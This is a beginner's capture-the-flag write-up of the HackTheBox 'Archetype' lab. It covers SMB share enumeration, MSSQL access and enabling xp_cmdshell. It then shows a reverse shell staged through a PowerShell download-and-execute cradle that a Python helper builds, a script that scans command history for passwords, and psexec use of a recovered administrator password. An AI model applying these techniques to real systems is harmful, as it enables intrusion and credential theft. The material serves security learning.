HackTheBox - Archetype Starting Point Write-Up

  • wyatt4al
  • Sep 6, 2021
  • 5 min read


Good morning ladies and gentlemen. As I continue my journey as an aspiring Subject Matter Expert in Cyber Security, I am going to start doing write-ups of the virtual boxes I complete. One reason is that I believe it will help me gain a deeper understanding of what I am doing; the other is that it may help those of you who are beginners like me and have a burning passion for becoming a master in this Cyber World.


This write-up covers the Archetype box from HackTheBox. It is the first box in their Starting Point path, which is meant to let you "Play some of our easy machines to get a grasp on how Hack The Box works." They rate these boxes "very easy", but for those of us who are new they can prove quite difficult, yet extremely educational. I will try to note everything I do in order to pass along my understanding as best I can. Without further ado, let's get moving!


If you are new to HackTheBox, let me begin by explaining some basic steps. They offer two ways to connect to their machines. The first is their built-in PwnBox, a browser-based virtual machine they provide with all of the tools and resources you need to complete the boxes. It is a great resource, but I prefer the second option: connecting to their server via OpenVPN, which lets you use your own virtual machine to interact with theirs.


The pros of doing this are mostly personal preference, but I thought I would share why I think it is the better option. By connecting over OpenVPN from your own VM, you can set up a folder for each box where you keep notes, scan output and any scripts you need, so everything new you learn is confined to one place and easy to find later. After creating an account, download the VPN configuration file for the lab you are working in and connect with the command below. OpenVPN needs root to create the tun interface, which is why it runs under sudo, and the address it assigns you on tun0 is the one you will use as your listener IP later on. I also advise installing Yakuake, a drop-down terminal, on your Kali box; you will thank me later.


sudo openvpn /path/to/yourdownloaded/configfile


Now, our first step is going to be basic reconnaissance.


I am going to run two nmap scans in order to get a basic understanding of the target machine.

Basic Scan: nmap -sV -vv --open 10.10.10.27 -oN basic.nmap
Vuln Scan: nmap --script=vuln 10.10.10.27 -oN vuln.nmap

Note: I will not explain what each argument and flag is for because I believe it is good practice to read the manual pages for commands in order to understand why you are using what you are using instead of just memorizing the entire command or noting it for future use.


After running these scans I had some solid information to work with.

Open Ports: 135 (MSRPC), 139 (NetBIOS session), 445 (SMB), 1433 (MSSQL)

Operating System: Windows (the version reported alongside the services was Windows Server 2008; a banner-based OS guess is approximate, so treat it as a hint rather than a fact)

1433: Microsoft SQL Server 2017

Vuln Scan: smb-vuln-ms08-067 reported as likely vulnerable to remote code execution (CVE-2008-4250). This NSE check is a heuristic that can produce false positives, and we will not need it: the rest of this write-up goes through the SMB shares instead.


Now that we know SMB (Server Message Block) is exposed on port 445, we have a direction for our enumeration: list the shares over a null session with smbclient (-N means no password is sent, -L lists the shares on the host).

smbclient -N -L \\\\10.10.10.27\\

To be honest, I am still learning what is supposed to be normal, but at first glance backups does not belong here. The other entries (names ending in $) are the administrative shares Windows creates by default, while backups is a custom share someone added, so it is the one to look at. We run smbclient again, this time connecting to backups with the same null session.

	smbclient -N \\\\10.10.10.27\\backups

Once connected to the backups share, I used dir to list the files inside and get to download the config file. After leaving the share, I read it with cat and found some interesting information: a User ID and a Password, the kind of connection settings an application uses to log in to the SQL server. hmm.



Now that I have credentials, it is time to gain a foothold. Since the target had an open port running SQL Server, I did some research and decided to try Impacket's mssqlclient.py. The following command got me access to the server (sudo is not needed; -windows-auth is used because sql_svc is a Windows login on the ARCHETYPE host rather than a SQL-only login, and the script prompts for the password found in the config file).

sudo python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth


After trying a few commands like whoami, pwd (print working directory) and ls/dir, I discovered that I was connected, but to a SQL prompt rather than a shell, so none of those work. MORE RESEARCH. What I needed was xp_cmdshell, a stored procedure that runs operating-system commands from inside SQL Server. It is disabled by default, and enabling it requires the sysadmin server role, which sql_svc turned out to have (otherwise sp_configure would have been refused). The following steps enable it and run whoami; note that this is command execution as the SQL service account, not privilege escalation.


	EXEC sp_configure 'show advanced options', 1;  -- expose the advanced settings, xp_cmdshell among them
	reconfigure                                    -- apply the change
	sp_configure                                   -- optional: list the settings and confirm xp_cmdshell is now visible
	EXEC sp_configure 'xp_cmdshell', 1;            -- turn xp_cmdshell on (requires the sysadmin role)
	reconfigure                                    -- apply the change
	xp_cmdshell "whoami"                           -- run an OS command; 'whoami' in single quotes is the portable T-SQL form

After running these commands you should see the output of whoami, which is the service account archetype\sql_svc. (Impacket's mssqlclient also ships built-in enable_xp_cmdshell and xp_cmdshell helper commands that do the same thing in one step.)


From here, we use our new ability to run commands through xp_cmdshell to download and run a reverse shell script. To do this we need to serve the file over HTTP from our own machine and set up a Netcat listener to catch the shell once the target executes it. You could use Python's built-in http.server (SimpleHTTPServer in Python 2), but I have discovered a tool that is even easier: Updog. Note that you need to run Updog inside the directory your script is located in, since it serves the current directory, and that the target must be able to reach your VPN (tun0) address on both the HTTP port and the listener port.


For this box I used Nishang's Invoke-PowerShellTcpOneLine.ps1. After cleaning it up (stripping the comments so that only the one-liner remains), I set the IP and port to my own tun0 address and listener port and renamed it to script.ps1.
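Getting the quoting right at this step is where most people stumble: the PowerShell download cradle goes inside a single-quoted T-SQL string, so every single quote in it has to be doubled. The following Python is added here as an example and is not part of the original post, of Nishang or of Impacket; it builds the xp_cmdshell statement from an attacker address and port. The address 10.10.14.5 and the port 9090 (Updog's default) are assumptions for the illustration, and script.ps1 is the file name used above.

```python
"""Build the xp_cmdshell statement that stages a hosted PowerShell script.

Added example (not from the original write-up). Assumption: the attacker
serves script.ps1 over plain HTTP from the VPN address lhost on port lport.
"""


def powershell_cradle(lhost: str, lport: int, script: str = "script.ps1") -> str:
    """Return the PowerShell command the target runs: fetch the script over
    HTTP and execute it in memory, so nothing is written to disk."""
    url = f"http://{lhost}:{lport}/{script}"
    return (
        "powershell -NoProfile -ExecutionPolicy Bypass -c "
        f"\"IEX (New-Object Net.WebClient).DownloadString('{url}')\""
    )


def tsql_quote(value: str) -> str:
    """Wrap a value as a T-SQL string literal: single-quoted, with every
    embedded single quote doubled. That is the only escaping T-SQL needs."""
    return "'" + value.replace("'", "''") + "'"


def tsql_unquote(literal: str) -> str:
    """Inverse of tsql_quote, used to check that the escaping round-trips."""
    if len(literal) < 2 or literal[0] != "'" or literal[-1] != "'":
        raise ValueError("not a single-quoted T-SQL literal")
    return literal[1:-1].replace("''", "'")


def xp_cmdshell_stmt(command: str) -> str:
    """Return the EXEC statement that runs `command` through xp_cmdshell."""
    return f"EXEC master..xp_cmdshell {tsql_quote(command)};"


def stager_statement(lhost: str, lport: int, script: str = "script.ps1") -> str:
    """Complete statement to paste at the mssqlclient prompt once xp_cmdshell is on."""
    return xp_cmdshell_stmt(powershell_cradle(lhost, lport, script))


if __name__ == "__main__":
    # Assumed attacker-side values for the illustration.
    cradle = powershell_cradle("10.10.14.5", 9090)
    assert tsql_unquote(tsql_quote(cradle)) == cradle
    print(stager_statement("10.10.14.5", 9090))
```

Paste the printed statement at the mssqlclient prompt after the two sp_configure steps, with Updog running in the directory holding script.ps1 and a Netcat listener (nc -lvnp on the port written into the script) waiting for the callback. The same tsql_quote helper applies to any other command you pass through xp_cmdshell.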



The shell drops us in C:\Windows\system32 running as the sql_svc user, so we can go for the user flag first. I navigated to C:\Users\sql_svc\Desktop to find it. Once you have the user flag, it is time for some privesc.


Right now we are in a service account called sql_svc. I have found it good practice to check recently accessed files and executed commands. By default, PowerShell's PSReadLine module saves console history to C:\Users\<accountname>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt, so we just need to cat that file (the location on a given host can be confirmed with (Get-PSReadLineOption).HistorySavePath). Check the history of every profile you can read, not only your own.

 cat C:\Users\<accountname>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\ConsoleHost_history.txt

This shows that the backups share was mapped using the Administrator account's password, typed in clear on the command line and therefore saved in the history. At first I did not know what to do with this information, but after MORE RESEARCH I found out that now is a great time to use Impacket's psexec.py. It authenticates over SMB with the administrator credentials, drops a service binary through the ADMIN$ share and starts it, which gives a shell running as SYSTEM. (The \! in the command below is escaping for bash, which would otherwise treat ! as history expansion.)

 python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\!\!@10.10.10.27


FINALLY. We now have a SYSTEM shell, which is to say full administrator privileges. All that is left is to navigate to the Administrator's Desktop and see if the root flag is there. What do you know, it was ;).
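The history check that cracked this box generalises: any command that takes a password on its command line ends up in ConsoleHost_history.txt. The following Python is added here as an example and is not part of the original write-up. It scans a history file for the common credential-bearing commands and skips the case where the password was prompted for rather than typed (net use with * as the password). The sample history is constructed for the illustration and the sqlcmd credentials in it are made up; only the administrator password is the one from this write-up.

```python
"""Scan a PSReadLine ConsoleHost_history.txt for commands that embed credentials.

Added example (not from the original write-up). The patterns cover a few
common Windows commands that accept a password on the command line.
"""
import re
from typing import Dict, List, Optional

# Default PSReadLine history location, relative to a user's profile directory.
HISTORY_RELPATH = r"AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

# Constructed sample history (not captured from the box). The second line
# models the finding in the write-up; the others exercise the other patterns.
SAMPLE_HISTORY = r"""cd C:\Users\sql_svc\Desktop
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
net use S: \\Archetype\backups /user:sql_svc *
sqlcmd -S localhost -U sa -P Summer2021!
exit
"""

# (kind, pattern): each pattern names a `secret` group and, where the
# command carries one, a `user` group.
CRED_PATTERNS = [
    ("net use", re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>\S+)", re.I)),
    ("cmdkey", re.compile(r"\bcmdkey(?:\.exe)?\b.*?/user:(?P<user>\S+).*?/pass:(?P<secret>\S+)", re.I)),
    ("sqlcmd", re.compile(r"\bsqlcmd(?:\.exe)?\b.*?-U\s*(?P<user>\S+).*?-P\s*(?P<secret>\S+)", re.I)),
    ("SecureString", re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?['\"](?P<secret>[^'\"]+)['\"]", re.I)),
]


def history_path(profile_dir: str) -> str:
    r"""History file for a profile directory such as C:\Users\sql_svc."""
    return profile_dir.rstrip("\\") + "\\" + HISTORY_RELPATH


def find_credentials(history_text: str) -> List[Dict[str, Optional[str]]]:
    """Return one record per history line that carries a usable secret."""
    hits: List[Dict[str, Optional[str]]] = []
    for lineno, line in enumerate(history_text.splitlines(), start=1):
        for kind, pattern in CRED_PATTERNS:
            match = pattern.search(line)
            if not match:
                continue
            secret = match.group("secret")
            # net use with * prompts for the password interactively, so the
            # history holds no secret; a line with no password token never matches.
            if secret == "*":
                break
            hits.append({
                "line": lineno,
                "kind": kind,
                "user": match.groupdict().get("user"),
                "secret": secret,
                "command": line.strip(),
            })
            break
    return hits


def load_and_scan(path: str) -> List[Dict[str, Optional[str]]]:
    """Scan a history file on disk (PSReadLine writes it as UTF-8 text)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_credentials(fh.read())


if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_HISTORY):
        print(f"line {hit['line']}: {hit['kind']} user={hit['user']} secret={hit['secret']}")
```

On a real host, copy the history file back over the reverse shell or the SMB share and run load_and_scan on it; the regexes are deliberately permissive, so treat every hit as a lead to verify rather than a confirmed password.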


This completes my very first write-up of a virtual box. Please give me as much critical feedback as you can so that I can learn from this experience. I hope this helped you as much as it helped me!




 
 
 

© 2023 by Robert Caro. Proudly created with Wix.com
